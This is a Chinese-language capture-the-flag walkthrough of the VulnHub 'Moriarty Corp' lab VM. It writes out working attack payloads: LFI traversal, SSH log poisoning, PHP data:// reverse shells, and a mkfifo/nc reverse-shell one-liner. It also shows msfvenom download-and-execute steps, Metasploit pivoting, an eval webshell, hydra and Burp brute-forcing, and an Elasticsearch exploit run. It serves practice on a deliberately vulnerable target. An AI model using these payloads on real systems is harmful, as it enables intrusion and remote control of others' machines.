打靶笔记-03-vulnhub-Moriarty Corp

打靶笔记-03-vulnhub-BoredHackerBlog

一、靶机信息

Name: BoredHackerBlog: Moriarty Corp(中-高级难度)
Date release: 29 Mar 2020
Author: BoredHackerBlog
Series: BoredHackerBlog

这个靶机下载页面有些提示,8000是提交flag的端口,没必要攻击,然后漏洞环境是安装在靶机的Docker中的,别的好像没了或者不太重要,可以按照完全啥也不知道进行打靶。

二、靶机启动

2.1 靶机hash校验

sha1sum MoriartyCorp.ova   
e9874e51a2645c1b61a3afc771aa5abdc94bf264  MoriartyCorp.ova

2.2 导入Virtualbox,并配置网络

这个靶机依然是适用于Vbox,而我攻击机器是在Vmware上搭建的,所以还是将Vbox的网络桥接到vmnet8上,使其处于一个网段,实战中这块无需多虑。
Img

2.3 启动靶机

为了以防万一,打个快照,启动靶机开始练习
Img

三、开始打靶

3.1 获取靶机IP

3.1.1 攻击机IP以及网卡信息

Img

3.1.2 主机发现

sudo arp-scan -I eth0 -l

Img
成功获取靶机IP为172.16.95.139

3.2 端口&服务扫描

3.2.1 扫描开放端口

sudo nmap -p- 172.16.95.139

Img
发现开放端口22、8000、9000

3.2.2 确认端口所对应服务

按照惯例,对端口后面的服务进一步确认

sudo nmap -p22,8000,9000 -sV 172.16.95.139

Img
可以看到分别是SSH、PythonWeb框架Werkzeug、Portainer Docker UI控制界面
搞到这儿,就可以有多条向下的思路
1. 爆破ssh
2. Portainer 1.19.2 是否有漏洞,它上面搭建的Application是否有web漏洞
3. Portainer 1.19.2 的漏洞利用
可以利用nmap或其他工具进行漏洞扫描测试,这里简单利用nmap的脚本扫描了一下,都没发现漏洞,所以可以先去访问下靶机提示的提交flag的8000端口。

3.3 访问8000端口

Img

3.3.1 开局

这个靶机的一切都从这里开始进入,先键入flag{start}进入第一关
Img
提示80端口,刚刚端口扫描没发现,现在重新扫描一遍
Img
果然开放了,看起来这个靶机是一关一关开放的,那就开始第一关吧。

3.3.2 第一关

访问80端口,直接搞开网页源代码
Img
发现这个页面比较简单,有点用处的就是两个链接,看到接收参数是file,而且值是个文件,我们有理由联想到文件包含,而且文件名可控,不过不知道路径可不可控,可以试一试,结合之前端口服务扫描确定的操作系统为linux,所以:

/?file=../../../../../../etc/passwd

Img
发现路径参数也可控,所以存在本地文件包含漏洞(LFI),而且包含的是敏感型文件,说明还存在目录遍历漏洞
所以接下来就好玩了,可以包含任意文件,那就也可以是webshell,然后用蚁剑或冰蝎等进行连接,但前提是判断服务器语言环境以及找到上传webshell的地方

  1. 后端环境为php环境
    简单判断了一下,或者也可以用Wappalyzer等插件确定
    Img
  2. 上传webshell的地方
    这个地方,可以通过污染日志文件的方式达到目的
ssh '<?php phpinfo();?>'@172.16.95.139
ssh '<?php system($_GET['shell']); ?>'@172.16.95.139

Img
这个肯定连接不上,因为压根没有这个用户名,但这里目的是为了污染ssh的连接日志文件。
为了验证是否成功污染,之前污染了phpinfo的内容进入日志,可以先包含一下看看:

?file=../../../../../../var/log/auth.log

最后好像失败了,应该是没有被污染,没想明白,这里记录一下,一会儿打进去看一下;

一会儿找到答案后记录在此
第一关打入进去之后,发现就没有此日志文件,后来才明白过来,这是个容器,而ssh的端口是宿主机的,然而宿主机的80端口映射到了容器中,这个漏洞网站是运行在容器中的,打死也包含不上啊,=-=

这里利用伪协议再次尝试:
首先是用了data伪协议:

?file=data:// text/plain,<?php phpinfo();?>
?file=data:// text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

Img
成功!!!那就可以使用data协议进行反弹shell了,如下是代码(一定要记得URL编码,否则代码中的一些字符例如&会被浏览器解析而无法进入后台执行):
开启nc进行监听

nc -lnvp 6666

反弹shell

?file=data://text/plain,<?php %24sock%3dfsockopen("172.16.95.133","6666")%3bexec(%22%2fbin%2fsh%20-i%20%3c%263%20%3e%263%202%3e%263%22)%3b?>

Img
直接执行php的反弹代码,结果一闪而过,应该是代码执行后就进行内存回收了,所以无法持续链接。所以需要可以采用如下的办法实现:

?file=data://text/plain,<?php $var=shell_exec($_GET['d']);echo $var;?>&d=rm%20%2ftmp%2ff%3bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7c%2fbin%2fsh%20-i%202%3e%261%7cnc%20172.16.95.133%206666%20%3e%2ftmp%2ff

// 或者采用base64转换后:
?file=data://text/plain;base64,
PD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydkJ10pO2VjaG8gJHZhcjs/Pg==&d=rm%20%2ftmp%2ff%3bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7c%2fbin%2fsh%20-i%202%3e%261%7cnc%20172.16.95.133%206666%20%3e%2ftmp%2ff

Img
成功拿到第一个flag,然后也提示了下一关信息是个内网
Img
3. 总结
反弹shell的shell_exec()函数可以自由更换,比如system(),还可以尝试其他协议,比如http的方式进行远程包含
不过这里有个坑,如下:
首先在远程服务器(这里直接以kali为例)上放置需要包含的文件

cd /var/www/html/
sudo echo '<?php phpinfo();?>' ./1.txt
sudo cp 1.txt 1.php

进行远程文件包含

?file=http://172.16.95.133/1.txt

Img
这而是先将1.txt的内容包含到了靶机上进行执行
进行如下远程包含

?file=http://172.16.95.133/1.php

Img
这是在远程服务器上执行后将执行后的html响应内容进行了包含
所以如果想要利用http的方式进行远程文件包含(RFI),要注意分辨包含的内容是什么,要进行反弹shell的话可以将如下下载到的php文件修改后缀名后挂载到远程服务器上再进行包含,否则拿到的shell就是自己远程服务器的shell
Img
如果不改后缀名的话,拿到的shell就是自己远程服务器的shell,如下就搞笑了:
Img
好了,这就开始进入第二关。。。

3.3.3 第二关

根据提示,这个服务器上(docker容器)没有任何信息,需要进一步内网渗透,也提示了内网网段172.17.0.3-254(也可以自己收集到)
Img
但是接下来,要进行内网渗透,攻击机器必须能够访问到内网网段

两种办法

  • 利用第一关拿到的shell提权,然后搞一堆攻击工具下来,远程操作,不过这个很不现实,基本可以放弃了
  • 利用第一关拿到的shell建立隧道,使得外网的攻击机器能够访问目标内网,这个可行,建立隧道的方式有很多种,我这里选择美少妇(MSF),回头尝试一下其他的方式并比较记录下来
3.3.3.1 建立隧道
  1. 开启msf,并开始监听,准备接收shell

    msfconsole
    use exploit/multi/handler
    set payload linux/x64/meterpreter_reverse_tcp
    show options
    set lhost 172.16.95.133
    set lport 8888
    run
    

    Img

  2. msfvenom生成相应的payload

    msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=172.16.95.133 lport=8888 -f elf >shell.elf
    

    Img

  3. 利用第一关的shell将生成的payload下载到目标机器执行进行上线

    cd /tmp
    wget http://172.16.95.133/shell.elf
    chmod +x shell.elf
    ./shell.elf
    

    Img
    成功上线
    Img

  4. 给获得的meterpreter添加内网路由

    route
    run autoroute -s 172.17.0.0/16
    background
    route print
    

    Img

  5. 开启msf的代理服务端功能

    sessions
    use auxiliary/server/socks_proxy
    show options
    run
    

    Img

  6. 配置proxychains以使用代理

    sudo vim /etc/proxychains4.conf
    

    将msf的代理服务器地址写入
    Img

  7. 测试隧道是否成功
    Img
    可以看到隧道已经建立成功

3.3.3.2 开始主机发现
proxychains nmap -p80,22,443 172.17.0.3-254

注意这里有个坑,就是走proxychains时最好用普通用户,我用root用户好像没扫出有效结果,不知道为啥。

之后找到答案,写在这里

Img
成功发现一台主机172.17.0.4开放了80端口

3.3.3.3 配置火狐代理访问内网

发现内网有一台主机开放了80端口,所以可以访问一下,但是浏览器也必须走socks5代理才可以,如下配置
Img
如下已经成功访问到,可以看出是一个文件上传的页面,看到文件上传就嘿嘿嘿了,不过貌似上传要密码
Img
或者还可以使用如下命令启动firefox,也可以访问到内网web应用

proxychains firefox 172.17.0.4

Img

3.3.3.4 文件上传利用

可以看到这个页面上传文件需要密码,那就只能爆破了,要想爆破就得抓包,所以必须得先让浏览器的包先到burp,然后burp挂着代理去和内网通信
浏览器=>Burp代理=>socks代理===>内网
所以需要做的就是浏览器设置代理到burp,然设置burp的socks代理,如下:

Img
Img
Img
到此就搭建好了,然后开始上传文件,爆破密码

  1. 这里打算上传webshell,先随便输入密码如下:
echo '<?php @eval($_POST['ant']);?>' > shell.php

Img
2. burp拦截并发送到intruder进行密码破解:
Img
Img
这里字典选择了rockyou,kali自带的很大的字典
Img
然后就可以暴力破解了
Img
没一会儿就找到了到密码,是password,上传之后shell.php的地址是./photo/22/shell.php
3. 上传成功,使用蚁剑链接,蚁剑也需要配置socks5代理
设置代理
Img
链接shell,这里没有自定义UA,可以在请求信息或者js文件中进行修改
Img

3.3.3.5 寻找flag

最终在根目录下找到第二个flag:2_flag.txt
Img
提交之后开启第三关
Img

3.3.4 第三关

根据提示信息,这关拿到了一些账户以及这些账户的hash,但是不知道具体哪个机器的ssh连接账户,先把账户记录和密码hash破解记录下来,分别保存为user.txt、password.txt
Img

  1. 扫描内网开放了22端口的主机,如果对方ssh服务没有更改端口号的话就是默认22
proxychains nmap -Pn -sT -p22 172.17.0.3-254

Img
2. 然后发现新的主机172.17.0.5开放了22端口,然后调用hydra进行尝试登陆破解

proxychains hydra -L user.txt -P password.txt

Img
很快就找到了ssh登陆账户root密码weapons
3. 开始尝试ssh连接
Img
4. 获取3_flag.txt并提交
Img
根据提示进入第四关,目标内网还搭建有聊天系统,可能在443、8000、8080、8888四个端口,然后还获得聊天系统的账户buyer13密码arms13

3.3.5 第四关

  1. 开始扫描443、8000、8080、8888端口开放主机
proxychains nmap -Pn -sT -p443,8000,8080,8888 172.17.0.3-254

Img
发现172.17.0.6的主机8000端口开放
2. 访问http://172.17.0.6:8000
Img
Img
Img
通过分析Chats中的内容,可以发现对方管理员账户为admin
3. 逻辑漏洞修改管理员密码
可以发现有一个Change Password的页面,访问一下,发现不用验证旧密码,先提交抓包看看
Img
Img
发现果然不需要旧密码,也没有验证码,判断这边是一个任意密码修改的逻辑漏洞
然后尝试将用户名修改为admin,放包,如果能够修改成功,则应该存在一个越权逻辑漏洞
Img
最后成功登陆admin
Img
在admin的Chats中发现了新的flag
Img
4. 提交flag进入下一关
Img
还提示内网还有一个Elasticsearch

3.3.6 第五关

Elasticsearch的默认端口是9200

  1. 扫描内网开放了9200端口的主机
proxychains nmap -Pn -sT -p9200 172.17.0.3-254

Img
很快就发现了主机172.17.0.7开放了9200,很可能就部署在这台服务器上
2. 访问http://172.17.0.7:9200
Img
果然,拿到了这个服务的一些信息
3. 搜寻Elasticsearch的历史漏洞信息

searchsploit Elasticsearch

Img
然后就挨个尝试吧
4. 漏洞利用
Img

proxychains python2 36337.py 172.17.0.7

Img
5. 提交flag,结束
Img

四、总结

这个靶机从开始的文件包含各种姿势反弹shell开始,涉及到了内网隧道搭建任意修改密码,越权等逻辑漏洞等,练习了反弹shell的姿势、msf的使用、burp联动二级代理以及漏洞查找思路等。
下次可以用下venom,据说也很好用。
这次没怎么涉及到免杀和绕过,将基本思路形成肌肉记忆后,需要再免杀和绕过上练习练习,毕竟之后实际环境不像靶机,不怎么设置waf和杀毒。

页面下部广告